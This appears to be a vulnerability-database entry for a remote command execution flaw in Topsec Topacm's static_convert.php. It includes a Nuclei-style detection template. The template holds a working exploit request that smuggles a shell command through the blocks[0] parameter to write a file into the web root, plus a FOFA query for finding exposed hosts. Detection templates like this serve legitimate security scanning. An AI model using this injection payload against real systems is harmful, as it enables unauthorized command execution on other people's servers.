topsec-topacm-rce: Topsec Topacm - Remote Code Execution

日期: 2025-08-01 | 影响软件: Topsec Topacm | POC: 已公开

漏洞描述

Tianrongxin Internet Behavior Management System static_convert.php remote command execution vulnerability

PoC代码[已公开]

id: topsec-topacm-rce

info:
  name: Topsec Topacm - Remote Code Execution
  author: SleepingBag945
  severity: critical
  description: |
    Tianrongxin Internet Behavior Management System static_convert.php remote command execution vulnerability
  reference:
    - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/TRXController.java
    - https://github.com/Phuong39/2022-HW-POC/blob/main/天融信-上网行为管理系统RCE.md
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="ActiveXObject" && body="dkey_login" && body="repeat-x"
  tags: rce,topsec,topacm,intrusive,vuln

http:
  - raw:
      - |
        GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27{{randstr}}%27%20%3E%20/var/www/html/config_application.txt%0a HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /config_application.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "{{randstr}}"

      - type: word
        part: header_2
        words:
          - text/plain

      - type: status
        part: header_2
        status:
          - 200
# digest: 4a0a0047304502210087ca136d8abbb232e7eadf98dca45e50ff207c0c4969830c18ef40b84f9ed975022064d2d3441084d9cd2d6b5af84e3c119f38b3a307c87e49c4d564e5a4eb48ac95:922c64590222798bb761d5b6d8e72950

相关漏洞推荐